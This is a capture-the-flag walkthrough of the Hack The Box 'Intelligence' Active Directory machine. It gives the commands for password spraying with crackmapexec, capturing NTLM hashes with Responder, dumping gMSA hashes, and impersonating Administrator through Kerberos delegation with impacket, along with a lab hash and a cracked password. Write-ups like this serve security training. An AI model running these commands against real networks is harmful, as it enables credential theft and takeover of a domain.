In this post, I would like to share a walkthrough on Intelligence Machine.


This room has been considered difficulty rated as a Medium machine

Information Gathering on Intelligence Machine


Once we have started the VPN connection, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN 

# Nmap 7.91 scan initiated Sun Jul  4 09:05:50 2021 as: nmap -sC -sV -oA intial -Pn 10.10.10.248
Nmap scan report for 10.10.10.248
Host is up (0.21s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-04 20:19:01Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-07-04T20:20:28+00:00; +7h12m33s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-07-04T20:20:25+00:00; +7h12m32s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-07-04T20:20:28+00:00; +7h12m33s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-07-04T20:20:25+00:00; +7h12m32s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h12m32s, deviation: 0s, median: 7h12m31s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2021-07-04T20:19:46
|_  start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul  4 09:07:55 2021 -- 1 IP address (1 host up) scanned in 125.33 seconds

From the result, we notice that the machine has configured Windows Active Directory LDAP.


** I’m so overly excited with this machine because i got to play with Active Directory **


We need to whitelist the domain name for the machine such as intelligence.htb 


Let’s open the browser and straight into the website interface.


The website shows an “Intelligence” website that doesn’t contain any login page or link to access with


However, we managed to notice there were two download links after we scroll down the website.


Oh wow.. We managed to obtain the default password of something on the pdf file.


There’s some way to obtain several of the pdf files and download them into our machine. (Oh wait! I just notice that there are more than 40 pdf files stored on the machine.)

***You can get tools to enumerate on the pdf file but I’m doing it manually***


We need to verify the user of the pdf creator or those who upload it on the website itself. Sadly, there’s a bunch of names or usernames that we found such as shown below:

Administrator
Guest
krbtgt
Danny.Matthews
Jose.Williams
Jason.Wright
Samuel.Richardson
David.Mcbride
Scott.Scott
David.Reed
Ian.Duncan
Michelle.Kent
Jennifer.Thomas
Kaitlyn.Zimmerman
Travis.Evans
Kelly.Long
Nicole.Brock
Stephanie.Young
John.Coleman
Thomas.Valenzuela
Thomas.Hall
Brian.Baker
Richard.Williams
Teresa.Williamson
David.Wilson
Darryl.Harris
William.Lee
Thomas.Wise
Veronica.Patel
Joel.Crawford
Jean.Walter
Anita.Roberts
Brian.Morris
Daniel.Shelton
Jessica.Moody
Tiffany.Molina
James.Curbow
Jeremy.Mora
Jason.Patterson
Laura.Lee
Ted.Graves

We should save those names into a single file which i save as user.txt in my case.

Enumerate the machine with crackmapexec


We can easily determine which user can use the password that we found earlier by executing the command crackmapexec smb <ip> -u <filename> -p <password that we found earlier>


** You can download crackmapexec over here


After a while, i managed to determine that, Tiffany.Molina is the username that we can use for that password


Let’s access the smb “Users” shares via Tiffany.Molina’s credentials by running the command smbclient \\\\intelligence.htb\\Users – U Tiffany.Molina


We managed to find the user flag on the \Tiffany.Moline\Desktop\ directory


However, we cannot read the flag by normal type command but there are a few ways to read the user flag over here.

  • Use “More” user.txt
  • get user.txt (which the file will be downloaded on our machine)

We can read the user flag and slap it into HTB Submit Flag Column

Escalate to Root Privileges Access


We need to bind the DNS record to our machine by using dnstool such as shown above.


For those who don’t have the tools, you can download the dnstool over here


For us to get those ntlm hashes that are shown above, you need to run the command “sudo responsder -I tun0 -A


We should copy-paste the NTLMv2 Hash onto a new file (any name should be fine). Once we have a password for Ted.Graves


We should be getting TED.Graves hashes by running the command python3 gMSADumper.py -u ‘Ted.Graves’ -p ‘Mr.Teddy’ -d ‘intelligence.htb’ -l ‘dc.intelligence.htb’


You need to update the time by executing the command sudo ntpdate <machine IP>


We should run the command from Impacket-getST intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes:d64b83fe606e6d3005e20ce0ee932fe2 -impersonate Administrator to get a ticker in Administrator.ccache


Therefore, we need to execute the export KRB5CCNAME=Administrator.ccache command to export the cache


We need to read the root flag by using impacket-atexec -k -no-pass dc.intelligence.htb ‘type C:\Users\Administrator\Desktop\root.txt’


In the screenshot above, i forgot to insert ‘ at the end of the command which I cannot read the root flag


I have re-try the command as above and it works!


-THE END-


Happy Learning Guys!